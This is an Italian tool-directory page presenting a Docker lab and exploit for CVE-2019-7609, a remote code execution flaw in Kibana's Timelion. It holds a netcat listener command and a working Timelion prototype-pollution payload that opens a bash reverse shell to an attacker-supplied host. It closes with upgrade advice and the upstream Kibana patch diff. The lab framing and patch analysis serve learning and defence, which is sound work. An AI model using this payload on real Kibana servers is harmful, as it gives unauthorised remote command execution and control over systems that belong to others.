Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-7609 — Ambiente di laboratorio basato su Docker e exploit per CVE-2019-7609 (Kibana Timelion RCE) con payload di reverse shell e analisi della patch. | Kitploit
Strumenti/GitHubGitHub/hekadan/cve-2019-7609
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneStrumento di Accesso RemotoLab e Pratica
GitHubhekadan/cve-2019-7609

CVE-2019-7609

Ambiente di laboratorio basato su Docker e exploit per CVE-2019-7609 (Kibana Timelion RCE) con payload di reverse shell e analisi della patch.

Vedi Repository
2036 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-7609 (Kibana)

Vulnerabilità di esecuzione remota di codice dovuta a un difetto nel visualizzatore Timelion di Kibana

Configurazione dell'ambiente (docker)

  1. Eseguire il file docker-compose.yml allegato.
root@kitploit:~
docker-comopse up -d
  1. Accedere a http://127.0.0.1:5601 nel browser.

Exploit

  1. Preparare una reverse shell.
root@kitploit:~
$ nc -lvp 6666
  1. Nella schermata Timelion di Kibana, inserire il payload e fare clic su Esegui.
root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/<IP_SERVER_ATTACCANTE>/6666 0>&1");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

  1. Fare clic su Canvas nel pannello di sinistra.
  2. La connessione reverse shell viene effettuata dal server Kibana :)

payload reverse-shell

Patch

Aggiornare Kibana alla versione 6.6.1 o 5.6.15 o successive.

Codice sorgente modificato

https://github.com/elastic/kibana/commit/3377f813a5d96ff466bdf7343ce161de24830ed4.patch

root@kitploit:~
From 3377f813a5d96ff466bdf7343ce161de24830ed4 Mon Sep 17 00:00:00 2001
From: ppisljar <[email protected]>
Date: Wed, 16 Jan 2019 06:01:20 -0800
Subject: [PATCH] fixes

---
 .../core_plugins/timelion/server/series_functions/props.js      | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/legacy/core_plugins/timelion/server/series_functions/props.js b/src/legacy/core_plugins/timelion/server/series_functions/props.js
index 81b74901d4db..80e9cafd6712 100644
--- a/src/legacy/core_plugins/timelion/server/series_functions/props.js
+++ b/src/legacy/core_plugins/timelion/server/series_functions/props.js
@@ -32,7 +32,7 @@ function unflatten(data) {
     let prop = '';
     let m;
     while (m = regex.exec(p)) {
-      cur = cur[prop] || (cur[prop] = (m[2] ? [] : {}));
+      cur = (cur.hasOwnProperty(prop) && cur[prop]) || (cur[prop] = (m[2] ? [] : {}));
       prop = m[2] || m[1];
     }
     cur[prop] = data[p];
Scarica lo strumento